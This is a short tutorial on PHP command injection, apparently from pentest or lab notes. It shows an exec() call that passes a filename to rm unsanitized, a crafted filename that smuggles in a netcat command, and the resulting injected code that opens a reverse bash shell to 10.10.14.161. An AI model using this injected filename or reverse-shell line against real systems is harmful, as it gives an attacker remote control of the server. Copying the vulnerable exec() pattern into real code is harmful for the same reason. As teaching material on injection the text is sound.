Command Injection

Some code can be vulnerable to command injection. Below we will show some common injection methods and where they can be found.

---

PHP

<?php exec("rm -f $fileName 2> /dev/null"); ?>

If we have control of the $file-variable we can inject our command and it will be executed by the system. The exec-function is a dangerous function and should never allow unsanitized user input.

touch '; nc 10.10.14.161 9004 -c bash ;'

The command above would abuse it and when embed the filename into the code the final PHP-Code would look like below:

<?php exec("rm -f ; nc 10.10.14.161 9004 -c bash ; 2> /dev/null"); ?>

After the loading the code again we should have a reverse shell.